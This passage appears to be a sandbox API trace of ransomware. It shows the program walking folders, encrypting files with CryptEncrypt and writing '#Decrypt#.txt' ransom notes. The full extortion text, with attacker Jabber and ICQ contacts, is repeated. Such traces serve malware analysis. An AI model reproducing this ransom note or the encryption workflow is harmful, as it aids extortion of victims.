pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.323] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskpred", cAlternateFileName="")) returned 1 [0233.323] lstrcmpiW (lpString1="oskpred", lpString2="Windows") returned -1 [0233.323] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 76 [0233.323] lstrcmpW (lpString1="oskpred", lpString2=".") returned 1 [0233.323] lstrcmpW (lpString1="oskpred", lpString2="..") returned 1 [0233.323] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.323] GetProcessHeap () returned 0x780000 [0233.323] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.323] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*") returned 78 [0233.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.324] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\.") returned 78 [0233.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.324] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\..") returned 79 [0233.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.324] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0233.324] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="Windows") returned -1 [0233.324] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 92 [0233.324] StrStrIW (lpFirst="oskpredbase.xml", lpSrch=".horseleader") returned 0x0 [0233.324] lstrcmpW (lpString1="oskpredbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.324] lstrcmpW (lpString1="oskpredbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.324] lstrlenW (lpString=".testttjffg") returned 11 [0233.324] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.324] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.600] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0233.710] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.711] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\#Decrypt#.txt") returned 90 [0233.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.713] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.713] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.714] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.714] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.714] CloseHandle (hObject=0x1a4) returned 1 [0233.715] GetProcessHeap () returned 0x780000 [0233.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.715] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0233.715] lstrcmpiW (lpString1="oskpred.xml", lpString2="Windows") returned -1 [0233.715] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 80 [0233.715] StrStrIW (lpFirst="oskpred.xml", lpSrch=".horseleader") returned 0x0 [0233.715] lstrcmpW (lpString1="oskpred.xml", lpString2="#Decrypt#.txt") returned 1 [0233.716] lstrcmpW (lpString1="oskpred.xml", lpString2="_uninstalling_.png") returned 1 [0233.716] lstrlenW (lpString=".testttjffg") returned 11 [0233.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", lpSrch=".testttjffg") returned 0x0 [0233.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.717] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="symbols", cAlternateFileName="")) returned 1 [0233.717] lstrcmpiW (lpString1="symbols", lpString2="Windows") returned -1 [0233.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 76 [0233.717] lstrcmpW (lpString1="symbols", lpString2=".") returned 1 [0233.717] lstrcmpW (lpString1="symbols", lpString2="..") returned 1 [0233.717] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.717] GetProcessHeap () returned 0x780000 [0233.717] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.717] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*") returned 78 [0233.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\.") returned 78 [0233.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.718] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.718] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\..") returned 79 [0233.718] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.718] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.718] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0233.718] lstrcmpiW (lpString1="ea-sym.xml", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 87 [0233.718] StrStrIW (lpFirst="ea-sym.xml", lpSrch=".horseleader") returned 0x0 [0233.718] lstrcmpW (lpString1="ea-sym.xml", lpString2="#Decrypt#.txt") returned 1 [0233.718] lstrcmpW (lpString1="ea-sym.xml", lpString2="_uninstalling_.png") returned 1 [0233.719] lstrlenW (lpString=".testttjffg") returned 11 [0233.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpSrch=".testttjffg") returned 0x0 [0233.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.719] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0233.719] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="Windows") returned -1 [0233.719] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 90 [0233.719] StrStrIW (lpFirst="ja-jp-sym.xml", lpSrch=".horseleader") returned 0x0 [0233.719] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="#Decrypt#.txt") returned 1 [0233.719] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="_uninstalling_.png") returned 1 [0233.719] lstrlenW (lpString=".testttjffg") returned 11 [0233.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpSrch=".testttjffg") returned 0x0 [0233.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.763] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0233.763] lstrcmpiW (lpString1="symbase.xml", lpString2="Windows") returned -1 [0233.763] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 88 [0233.763] StrStrIW (lpFirst="symbase.xml", lpSrch=".horseleader") returned 0x0 [0233.763] lstrcmpW (lpString1="symbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.763] lstrcmpW (lpString1="symbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.763] lstrlenW (lpString=".testttjffg") returned 11 [0233.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.763] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0233.763] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.764] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\#Decrypt#.txt") returned 90 [0233.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.764] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.764] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.766] lstrlenA 